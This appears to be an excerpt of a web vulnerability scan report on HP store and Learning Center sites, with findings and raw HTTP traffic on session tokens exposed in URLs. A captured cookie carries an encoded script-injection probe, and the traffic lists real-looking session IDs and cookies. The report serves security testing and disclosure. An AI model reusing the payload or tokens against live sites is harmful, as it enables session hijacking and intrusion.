GET /store?Action=PostCheckoutPaymentQuickBuyCartPage&Env=BASE&Locale=en_US&SiteID=hpappli HTTP/1.1
Host: hp.digitalriver.com
Connection: keep-alive
Referer: https://hp.digitalriver.com/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=hpappli&id=QuickBuyCartPage
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31; ORA_WX_SESSION="10.2.2.18:516-0#0"; JSESSIONID=730A178A040DADA09433BBF2D8444EEB; VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; BIGipServerp-drh-dc2pod8-pool1-active=302121482.516.0000; op638homepagegum=a00c00g00h276um0g631z079b; op638homepageliid=a00c00g00h276um0g631z079b; fcR=http%3A//burp/show/0; op_browser=safari_534.24; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fhp.digitalriver.com%2Fstore%2Fhpappli%2FDisplayHomePage%2F%3F3a310--%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253E458acdd922d%3D1; fcP=C=0&T=1309434815233&DTO=1309434815228&U=1313415981&V=1309434830029; fcPT=http%3A//hp.digitalriver.com/store%3FSiteID%3Dhpappli%26Action%3DDisplayProductDetailsPage%26productID%3D231257200%26OfferID%3D7468710109; fcC=X=C1313415981&Y=1309434830040&FV=10&H=1309434830029&Z=1&E=7371833&F=0&I=1309434833204

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: https://hp.digitalriver.com/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=hpappli&id=QuickBuyCartPage
Content-Type: text/plain
Set-Cookie: VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; expires=Fri, 29-Jun-2012 17:43:33 GMT; path=/
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=121090585420,0)
Content-Length: 0
Date: Thu, 30 Jun 2011 11:54:20 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app83

5. Session token in URL previous next
There are 9 instances of this issue:

http://h30187.www3.hp.com/
http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm
http://h30187.www3.hp.com/howto_QL_courses.jsp
http://h30187.www3.hp.com/index.jsp
http://h30415.www3.hp.com/css.jsp
http://h30415.www3.hp.com/domovoi.jsp
http://h30415.www3.hp.com/index.jsp
http://h30415.www3.hp.com/skins/hpgateway_skin.jsp
http://h30415.www3.hp.com/skins/hpgateway_ui.jsp

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

5.1. http://h30187.www3.hp.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://h30187.www3.hp.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://h30187.www3.hp.com/?hplcpsession.id=ccffa6efd534215680f21de99d92&tab=allClasses
http://h30187.www3.hp.com/?hplcpsession.id=ccffa6efd534215680f21de99d92&tab=atWork
http://h30187.www3.hp.com/?hplcpsession.id=ccffa6efd534215680f21de99d92&tab=getStarted
http://h30187.www3.hp.com/all_courses.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/articles/viewArticle/p/courseId/39573/Keep_your_kids_safe_.htm?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/campus/p/campusId/11261/Digital_photography.htm?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/campus/p/campusId/11262/Home_office.htm?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/campus/p/campusId/11263/Microsoft_Office_and_Adobe.htm?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/campus/p/campusId/11264/PC_security_and_maintenance.htm?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/courses/overview/p/courseId/38089/Network_attached_storage.htm?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/courses/overview/p/courseId/39815/Touch_up_digital_pho.htm?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/courses/overview/p/courseId/40470/Beginner_s_guide_to_digital_scrapbooking.htm?campusId=11200&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/courses/refer.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92&target=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jsp
http://h30187.www3.hp.com/discussions/forum/p/forumId/37182/Office_productivity.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/discussions/forum/p/forumId/37183/Lifestyle_and_personal_development.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/discussions/forum/p/forumId/37184/Digital_photography_and_design.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/discussions/forum/p/forumId/37187/Personal_computing.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/discussions/messageBoard/p/messageBoardId/2338/All_Campuses.htm?campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/discussions/new/viewMessageBoard/p/messageBoardId/2338?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/discussions/viewTopic/p/postId/2302987/messageBoardId/2338/topicId/2302813/Re_Vista_problem.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/discussions/viewTopic/p/postId/2302988/messageBoardId/2338/topicId/2302111/Re_AdvancedWord.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/discussions/viewTopic/p/postId/2302994/messageBoardId/2338/topicId/2268940/Re_INTRODUCE_YOURSELF_HERE_.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/discussions/viewTopic/p/topicId/2302989/advanced_word_lesson_4_quiz.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/discussions/viewTopic/p/topicId/2302993/WLAN_not_tured_on.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/howto_QL_courses.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92&contentType=How-to+in+2
http://h30187.www3.hp.com/howto_QL_courses.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92&contentType=Quick+Lesson
http://h30187.www3.hp.com/index.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/0055a93c81/p/productId/104931/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/377915c13a/p/productId/104920/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/47de376cbf/p/productId/104919/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/7bdaeea525/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/7d2e73b35e/p/productId/104834/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/8e6c3b5c3a/p/productId/104694/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/9470fce99c/p/productId/104917/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/b5e7983cde/p/productId/104693/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/c86c3e874a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/ccbf0286c0/p/productId/104833/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/ecf85dd99c/p/productId/104695/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/is/f2a788ab09/p/productId/104921/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/page/p/title/faq?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/rssfeed/index.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/sessions/index.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92
http://h30187.www3.hp.com/support/contactUs.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92
https://h30187.www3.hp.com/security/forgotPassword.jsp?target=http://h30187.www3.hp.com/index.jsp?forgot=true&hplcpsession.id=ccffa6efd534215680f21de99d92
https://h30187.www3.hp.com/security/login.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92&target=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jsp
https://h30187.www3.hp.com/security/register.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92

Request

GET / HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Jun 2011 11:49:59 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:06 GMT
Set-Cookie: hplcpsession.id=ccffa6efd534215680f21de99d92; path=/
Set-Cookie: JSESSIONID=abcArzKl3wxVy4fELyGdt; path=/
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38;PATH=/
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 66305
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">

<head>
<title>
HP
Learning center
...[SNIP]...
<h2 id="sectionalNavHeader">»<a href="/index.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92" class="bold">Learning center</a>
...[SNIP]...
</span> <a href="https://h30187.www3.hp.com/security/login.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92&target=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jsp" class="navmenu">Sign in</a>
...[SNIP]...
</span> <a href="/sessions/index.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92">My classes</a>
...[SNIP]...
</span> <a href="/all_courses.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92">All classes</a>
...[SNIP]...
</span> <a href="/discussions/new/viewMessageBoard/p/messageBoardId/2338?hplcpsession.id=ccffa6efd534215680f21de99d92">Discussions</a>
...[SNIP]...
</span> <a href="/page/p/title/faq?hplcpsession.id=ccffa6efd534215680f21de99d92">FAQ</a>
...[SNIP]...
</span> <a href="/support/contactUs.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92">Contact us</a>
...[SNIP]...
</span> <a href="/courses/refer.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92&target=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jsp">Tell a friend</a>
...[SNIP]...
</span><a href="/?hplcpsession.id=ccffa6efd534215680f21de99d92&tab=atWork" >At work</a>
...[SNIP]...
</span><a href="/?hplcpsession.id=ccffa6efd534215680f21de99d92&tab=allClasses" >See all classes</a>
...[SNIP]...
</span><a href="/?hplcpsession.id=ccffa6efd534215680f21de99d92&tab=getStarted" >Get started</a>
...[SNIP]...
<div class="Button">

<a href="https://h30187.www3.hp.com/security/register.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92" title="Register - it's free!">Register - it's free! »</a>
...[SNIP]...
</span><a href="https://h30187.www3.hp.com/security/forgotPassword.jsp?target=http://h30187.www3.hp.com/index.jsp?forgot=true&hplcpsession.id=ccffa6efd534215680f21de99d92" >Forgot your password?</a>
...[SNIP]...
<div id="FeaturedCourseImage" class="">

<a href="/courses/overview/p/courseId/40470/Beginner_s_guide_to_digital_scrapbooking.htm?campusId=11200&hplcpsession.id=ccffa6efd534215680f21de99d92" ><img src="http://hplc-prod.s3.amazonaws.com/media/50685/Beg_guide_to_digital_scrapbooking_v5_180x110.jpg?v=1307469870000" border="0" alt="Beginner's guide to digital scrapbooking"/>
...[SNIP]...
</span><a href="/courses/overview/p/courseId/40470/Beginner_s_guide_to_digital_scrapbooking.htm?campusId=11200&hplcpsession.id=ccffa6efd534215680f21de99d92" class="color003366bld" title="This class introduces you to the fascinating world of digital scrapbooking. You'll learn how to create, print, save, and share a scrapbook page, start to finish.">Beginner's guide to digital scrapbooking</a>
...[SNIP]...
<div class="Button">

<a href="/courses/overview/p/courseId/40470/Beginner_s_guide_to_digital_scrapbooking.htm?campusId=11200&hplcpsession.id=ccffa6efd534215680f21de99d92" >Enroll Now »</a>
...[SNIP]...
</span><a href="/all_courses.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92" class="bold" title="See all classes">See all classes</a>
...[SNIP]...
<div class="Column LeftColumn">

<a href="/campus/p/campusId/11261/Digital_photography.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" ><img src="http://hplc-prod.s3.amazonaws.com/media/46048/digital-photography.jpg?v=1281723386000" alt="Digital photography"/>
...[SNIP]...
</span><a href="/campus/p/campusId/11261/Digital_photography.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >Digital photography</a>
...[SNIP]...
</span><a href="/campus/p/campusId/11261/Digital_photography.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >See all 22 classes</a>
...[SNIP]...
<div class="Column LeftColumn">

<a href="/campus/p/campusId/11262/Home_office.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" ><img src="http://hplc-prod.s3.amazonaws.com/media/46049/home-office.jpg?v=1281723061000" alt="Home office"/>
...[SNIP]...
</span><a href="/campus/p/campusId/11262/Home_office.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >Home office</a>
...[SNIP]...
</span><a href="/campus/p/campusId/11262/Home_office.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >See all 42 classes</a>
...[SNIP]...
<div class="Column LeftColumn">

<a href="/campus/p/campusId/11263/Microsoft_Office_and_Adobe.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" ><img src="http://hplc-prod.s3.amazonaws.com/media/46050/ms-office-adobe-home.jpg?v=1281723061000" alt="Microsoft Office and Adobe"/>
...[SNIP]...
</span><a href="/campus/p/campusId/11263/Microsoft_Office_and_Adobe.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >Microsoft Office and Adobe</a>
...[SNIP]...
</span><a href="/campus/p/campusId/11263/Microsoft_Office_and_Adobe.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >See all 32 classes</a>
...[SNIP]...
<div class="Column LeftColumn">

<a href="/campus/p/campusId/11264/PC_security_and_maintenance.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" ><img src="http://hplc-prod.s3.amazonaws.com/media/46051/pc-security-home.jpg?v=1281723387000" alt="PC security and maintenance"/>
...[SNIP]...
</span><a href="/campus/p/campusId/11264/PC_security_and_maintenance.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >PC security and maintenance</a>
...[SNIP]...
</span><a href="/campus/p/campusId/11264/PC_security_and_maintenance.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >See all 23 classes</a>
...[SNIP]...
</span><a href="/all_courses.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92" >See all classes</a>
...[SNIP]...
</span><a href="/howto_QL_courses.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92&contentType=How-to+in+2" class="bold">How-to videos</a>
...[SNIP]...
</span><a href="/howto_QL_courses.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92&contentType=Quick+Lesson" class="bold">Quick lessons</a>
...[SNIP]...
</span><a href="/courses/overview/p/courseId/38089/Network_attached_storage.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >Network attached storage</a>
...[SNIP]...
</span><a href="/articles/viewArticle/p/courseId/39573/Keep_your_kids_safe_.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >Keep your kids safe on the internet: creating an internet use action plan (quick lesson)</a>
...[SNIP]...
</span><a href="/courses/overview/p/courseId/39815/Touch_up_digital_pho.htm?hplcpsession.id=ccffa6efd534215680f21de99d92" >Touch up digital photos with Adobe.. Photoshop.. Elements 8</a>
...[SNIP]...
</span><a href="/discussions/viewTopic/p/postId/2302994/messageBoardId/2338/topicId/2268940/Re_INTRODUCE_YOURSELF_HERE_.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" >Re: INTRODUCE YOURSELF HERE!</a>
...[SNIP]...
<div class="postMetaData small">
Posted about 7 hours ago
in

<a href="/discussions/forum/p/forumId/37184/Digital_photography_and_design.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" class="udrline">Digital photography and design</a>
...[SNIP]...
</span><a href="/discussions/viewTopic/p/topicId/2302993/WLAN_not_tured_on.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" >WLAN not tured on</a>
...[SNIP]...
<div class="postMetaData small">
Posted about 9 hours ago
in

<a href="/discussions/forum/p/forumId/37183/Lifestyle_and_personal_development.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" class="udrline">Lifestyle and personal development</a>
...[SNIP]...
</span><a href="/discussions/viewTopic/p/topicId/2302989/advanced_word_lesson_4_quiz.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" >advanced word lesson 4 quiz</a>
...[SNIP]...
<div class="postMetaData small">
Posted about 15 hours ago
in

<a href="/discussions/forum/p/forumId/37182/Office_productivity.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" class="udrline">Office productivity</a>
...[SNIP]...
</span><a href="/discussions/viewTopic/p/postId/2302988/messageBoardId/2338/topicId/2302111/Re_AdvancedWord.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" >Re: AdvancedWord</a>
...[SNIP]...
<div class="postMetaData small">
Posted about 15 hours ago
in

<a href="/discussions/forum/p/forumId/37182/Office_productivity.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" class="udrline">Office productivity</a>
...[SNIP]...
</span><a href="/discussions/viewTopic/p/postId/2302987/messageBoardId/2338/topicId/2302813/Re_Vista_problem.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" >Re: Vista problem</a>
...[SNIP]...
<div class="postMetaData small">
Posted about 17 hours ago
in

<a href="/discussions/forum/p/forumId/37187/Personal_computing.htm?messageBoardId=2338&campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" class="udrline">Personal computing</a>
...[SNIP]...
</span><a href="/discussions/messageBoard/p/messageBoardId/2338/All_Campuses.htm?campusId=700&hplcpsession.id=ccffa6efd534215680f21de99d92" class="bold">See all topics</a>
...[SNIP]...
<img src="/resources/images/s.gif" border="0" width="5" height="1" alt=""/>
<a href="/courses/refer.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92&target=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jsp" class="bold">Email this site</a>
...[SNIP]...
<div id="rssLink"><a href="/rssfeed/index.jsp?hplcpsession.id=ccffa6efd534215680f21de99d92" class="udrlinebold">RSS feed</a>
...[SNIP]...
<div style="display:none">
   <img src="/is/7bdaeea525/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/b5e7983cde/p/productId/104693/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/8e6c3b5c3a/p/productId/104694/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/ecf85dd99c/p/productId/104695/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/ccbf0286c0/p/productId/104833/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/7d2e73b35e/p/productId/104834/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/c86c3e874a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/0055a93c81/p/productId/104931/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/47de376cbf/p/productId/104919/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/9470fce99c/p/productId/104917/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/377915c13a/p/productId/104920/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
   <img src="/is/f2a788ab09/p/productId/104921/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=ccffa6efd534215680f21de99d92" height="1" width="1" alt=""/>
</div>
...[SNIP]...

5.2. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://h30187.www3.hp.com
Path:	/campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The response contains the following links that appear to contain session tokens:

http://h30187.www3.hp.com/all_courses.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/articles/viewArticle/p/courseId/38756/Photoshop_101_image_.htm?courseSessionId=305979&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/articles/viewArticle/p/courseId/39570/Adobe_Photoshop_CS4_layer_basics_quick_lesson_.htm?courseSessionId=306047&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/articles/viewArticle/p/courseId/39807/Exploring_color_mode.htm?courseSessionId=320073&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/articles/viewArticle/p/courseId/39808/Changing_hue_and_sat.htm?courseSessionId=320072&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/courses/overview/p/courseId/12976/Jump_start_your_crea.htm?courseSessionId=306013&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/courses/overview/p/courseId/23629/Intermediate_website_design.htm?courseSessionId=306011&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/courses/overview/p/courseId/34389/Adobe_Photoshop_CS4_introduction.htm?courseSessionId=306003&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/courses/overview/p/courseId/39129/Print_marketing_mate.htm?courseSessionId=306031&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/courses/overview/p/courseId/7/Building_your_first_web_page.htm?courseSessionId=319918&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/courses/refer.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f&target=http%3A%2F%2Fh30187.www3.hp.com%2Fcampus%2Fp%2FcampusId%2F10640%2FGraphic_arts.htm&campusId=10640
http://h30187.www3.hp.com/discussions/new/viewMessageBoard/p/messageBoardId/2338?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/howto_QL_courses.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f&contentType=How-to+in+2
http://h30187.www3.hp.com/howto_QL_courses.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f&contentType=Quick+Lesson
http://h30187.www3.hp.com/index.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/is/0661d64dfc/p/productId/104912/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/is/3092198518/p/productId/104916/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/is/3461c7ae0c/p/productId/104915/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/is/450e08e825/p/productId/104913/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/is/8242affead/p/productId/104906/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/is/b1e9f1dda3/p/productId/104908/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/is/dae5029aaa/p/productId/104907/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/page/p/title/faq?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/page/p/title/general_faqs?hplcpsession.id=ddde6b1e223a54f104d30891553f#4
http://h30187.www3.hp.com/rssfeed/index.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/sessions/index.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f
http://h30187.www3.hp.com/support/contactUs.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f
https://h30187.www3.hp.com/security/login.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f&target=http%3A%2F%2Fh30187.www3.hp.com%2Fcampus%2Fp%2FcampusId%2F10640%2FGraphic_arts.htm

Request

GET /campus/p/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Jun 2011 11:50:05 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:11 GMT
Set-Cookie: hplcpsession.id=ddde6b1e223a54f104d30891553f; path=/
Set-Cookie: JSESSIONID=abc90wSffaQ6U6JTMyGdt; path=/
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392C1E4830C54ECB49A6E4104218808A781F7C4F8A19AB96069A029839FFE95A122B91AE95A1A2770D491AC17E946292851;PATH=/
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
X-Nginx-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 57735
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">

<head>
<title>
HP
Learning center
...[SNIP]...
